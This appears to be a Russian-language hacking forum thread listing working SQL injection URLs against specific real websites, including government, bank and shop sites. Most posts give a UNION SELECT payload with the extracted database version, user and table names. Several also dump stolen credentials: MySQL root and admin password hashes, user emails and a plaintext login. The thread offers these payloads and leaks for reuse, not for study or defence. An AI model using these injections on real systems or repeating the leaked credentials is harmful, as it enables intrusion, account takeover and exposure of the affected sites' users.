http://www.gateway.uz пр5, тиц 20 Code: http://www.gateway.uz/index.php?article=-1 UNION SELECT 1, concat_ws(0x3A3A, user(),database(),version()) uzdg@localhost::uzdg::5.0.32-Dotdeb_1.dotdeb.1-log Code: http://www.gateway.uz/index.php?article=-1 UNION SELECT 1, group_concat( concat_ws( 0x3A3A, TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME ) SEPARATOR 0x3C62723E ) FROM information_schema.COLUMNS GROUP BY TABLE_SCHEMA, TABLE_NAME доступ в information_schema, смотрите таблички наздоровье.
http://www.barretos.sp.gov.br/link.php?xvar=visualizar_noticia.php&xid=2775+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* version(): 5.0.32-Debian_7etch8-log database(): prefeitura user(): prefeitura@localhost http://www.barretos.sp.gov.br/link.php?xvar=visualizar_noticia.php&xid=2775+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,concat(user,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user/* root:*F198BE3CAC3D18166686B06616A7AF91F12C216B debian-sys-maint:*6CAC5B20416E98730147E916FA95DC269C642096 prefeitura:*BBC9CA993C596C217D96B21D23D4C158D9902521 moodle:*AFF9BCF11C745F9D5B71243B22B436F452094DE2
Code: http://www.f1ticket.info/pages.php?ID=-1+union+all+select+0,convert(concat_ws(version(),user(),database())+using+latin1),2,3,4,5,6,7-- юзер/версия/бд: Code: [email protected]_4sarge2-logf1ticket
http://www.toris.ru http://www.toris.ru/?d=helper&id=-1+union+select+null,concat_ws(ver sion(),us er(),data base()),3-- [email protected]
Code: http://www.atmtravel.com.au/productinfo.php?id=-1+union+all+select+0,1,2,3,4,5,concat_ws(version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18-- юзер/версия/бд: Code: [email protected] все таблицы: Code: http://www.atmtravel.com.au/productinfo.php?id=-1+union+all+select+0,1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables-- колонки из таблици admin: Code: http://www.atmtravel.com.au/productinfo.php?id=-1+union+all+select+0,1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.columns+where+table_name='admin'-- но увы при попытке вывода из колонок получаю ошибку возможно что то туплю, возможно прав не хватает ***добавлено*** вывод: http://www.atmtravel.com.au/productinfo.php?id=-1+union+all+select+0,1,2,3,concat_ws(0x3a,admin_id,admin_name,admin_email,admin_pass,admin_level),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+test.admin это я протупил! Спасибо R1dex! ----------------------------------------------- The End!
Code: http://www.topcasinos.es/juego/bingo.php?id=33+and+1=0+union+select+1,version(),3,4/* там их точно 4. спасибо R1dex
www.pswdoptimists.org Code: http://www.pswdoptimists.org/news.php?ax=v&n=1&id=10&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5-- Version: 5.0.67-community User: pswdopti_admin@localhost Database: pswdopti_cms
Code: http://www.supervolos.ru/index1.php?option=news&page=1&id=-1+union+select+concat_ ws(0x3a ,version(),database(),user()),2,3-- Database Version : 5.0.54 Database name : z262240_svolos User name : z262240_igoruser@localhost ----------------------------------------------------+ Code: http://www.taraplast.com.ua/articleview.php?id=-1+union+select+1,concat_ws(0x3a,ve rsion(),data base(),user()),3,4,5,6,7,8,9,10-- Database Version : 5.0.45-log Database name : taraplas_main User name : taraplas_user@localhost какой-то один юзверь, скорее всего админ: Code: http://www.taraplast.com.ua/articleview.php?id=-1+union+select+1,concat_ws(0x3a,login,pass word),3,4,5,6,7,8,9,10+from+login+li mit+0,1-- Code: mythical:mistake
Code: http://www.ccst.gov.cn/newsView.php?cid=16&id=2999+UNION+SELECT+1,2,3,version(),5,6,7,8,9,10,11,12,13+FROM+users+LIMIT+1,1/* Version():4.0.17-standard Database():ccst2006 User():root@localhost Code: http://www.ccst.gov.cn/newsView.php?cid=16&id=2999+UNION+SELECT+1,concat(uid,0x3a,username,0x3a,password),3,concat(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,13+FROM+users+LIMIT+1,1/* 4:xuguoxin:5668744b4e9be33ea7f34f2534e41455 Code: http://www.ccst.gov.cn/newsView.php?cid=16&id=2999+UNION+SELECT+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+FROM+mysql.user+LIMIT+1,1/* root:67457e226a1a15bd
http://www.burnopfieldcc.com/display.php?pageid=5/**/UNION/**/SELECT/**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* Database Version: 4.1.22 Database name: burnopfieldcc_com_-_database User name: burnopfield@localhost
Code: http://www.readybiz.ru/?p=projects&row_id=-99+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9-- readybiz@localhost:readybiz2:5.0.45-community Pagerank: 0 тИЦ: 50 Code: http://www.readybiz.ru/?p=projects&row_id=-99+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables-- Code: COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS accesslevels contacts forum images legalbiz_clients legalbiz_clients_types legalbiz_laws legalbiz_laws_arb linker_catalog linker_links mailing news project_types projects site_menus site_users sites themes users vote_ankets vote_answers vote_questions vote_types vote_variants xfields xtables clients counter counter_stats legalbiz2_clients legalbiz2_clients_types legalbiz2_laws legalbiz2_laws_arb works works_types phpbb_auth_access phpbb_banlist phpbb_categories phpbb_config phpbb_confirm phpbb_disallow phpbb_forum_prune phpbb_forums phpbb_groups phpbb_posts phpbb_posts_text phpbb_privmsgs phpbb_privmsgs_text phpbb_ranks phpbb_search_results phpbb_search_wordlist phpbb_search_wordmatch phpbb_sessions phpbb_smilies phpbb_themes phpbb_themes_name phpbb_topics phpbb_topics_watch phpbb_user_group phpbb_users phpbb_vote_desc phpbb_vote_results phpbb_vote_voters phpbb_words readybiz_clients readybiz_clients_types readybiz_laws readybiz_laws_arb contacts_spam readybiz2_clients readybiz2_clients_types readybiz2_laws readybiz2_laws_arb -- Code: http://www.tokdubna.ru/new/shop.php?p=12&id=-57111+union+select+1,concat_ws(0x3a,user(),database(),version())-- tokdubna@localhost:tok:5.0.51a Pagerank: 2 тИЦ: 10 Code: http://www.tokdubna.ru/new/shop.php?p=12&id=-57111+union+select+1,table_name+from+information_schema.tables+limit+0,1-- Вывод через limit Code: COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS backups news readypc shop_cart shop_catalog shop_description shop_images shop_orders shop_price shop_setup site_menus site_users sites users xfields xtables Code: http://www.tokdubna.ru/new/shop.php?p=12&id=-57111+union+select+1,concat_ws(0x3a,login,password,email)+from+users+limit+0,1-- jb:68fa2f3e596f4b8aae30a00aad4916e2:CodePro:[email protected] Code: http://www.tokdubna.ru/new/shop.php?p=12&id=-57111+union+select+1,concat_ws(0x3a,login,password,email)+from+users+limit+1,1-- strodi:2165a70e5a5808e376b5ed564a332bf1:zaslonka:[email protected] и т.д...
PostgreSQL 7.3.4 on i386-redhat-linux-gnu, compiled by GCC i386-redhat-linux-gcc (GCC) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
шоп! Code: http://shop.bea.vn/fun/components/truyen/read.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5-- юзер/версия/бд: Code: [email protected]_fun Code: http://shop.bea.vn/fun/components/truyen/read.php?id=-1+union+all+select+0,1,concat_ws(0x3a,username,password),3,4,5+from+user-- юзер/пасс: Code: admin:9fb3c27488be2c154eac22aaaba5f2ea ------------------------------------------------------------------------- The End!
Code: http://www.ritex-t.ru/index.php?id=2&row=-13+union+select+1,2,3,concat_ ws(0x3 a,version(),database(),user()),5,6,7,8-- Database Version : 5.0.67-log Database name : u57230 User name : [email protected] все таблицы и колонки сразу, выводятся без лимита : Code: http://www.ritex-t.ru/index.php?id=2&row=-13+union+select+1,2,3,concat_ws(0x3a,table_name,column_name),5,6,7,8+from+INF ORMATION_SCHEM A.COLUMNS-- а вот и админы: Code: adminvs:8621e77d22f0830a46b462e3f46ed917 colibry:7bbd1c39b867f00d0b9512ce0331988a nata:77369e37b2aa1404f416275183ab055f coladmin:1e1277d611010823e083b3d8a6ac5ace
Code: http://bank-ua.com/index.php?page=publishing_news&id=20200+union+select+1,2,3,4,5,6,7,8+limit+1,1/* Version(): 5.0.32-Debian_7etch8-log Database() bankua_db User(): bankua_usr@localhost
http://www.letsdolunch.info/news-display.php?ID=-1+union+select+1,2,3,4,5,6,7,8/* Database Version: 4.1.22 Database name: durhamsletsdolunch User name: durhamsletsdolun@localhost
http://www.dapnl-pd.ro/document.php?id=-82+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12-- Database Version: 4.1.22-standard-log Database name: dapnl_dapnl User name: dapnl_dapnl@localhost
Шопы: Code: http://nocona.org/shopping.php?id=-1+union+all+select+concat_ws(0x3a,version(),user(),database())+from+users-- версия/юзер/бд: Code: 4.0.16-nt:[email protected]:nocona есть таблица users ----------------------------------------------------------------------- Code: http://www.kohlrusch.biz/shop/shop_artikel_details.php4?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12-- версия/юзер/бд: Code: 4.0.27-standard-log:[email protected]:db69047444 ----------------------------------------------------------------------- The End!
appleservice.ru Code: http://www.appleservice.ru/?news_id=-1' UNION SELECT 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14/*
http://www.sibiu.ro/ro2/cic/unact.php?id=-89+union+select+concat_ws(0x3a,version(),database(),user()),2,3 Database Version: 5.0.45-Debian_1ubuntu3-log Database name: mysql01db41 User name: [email protected]
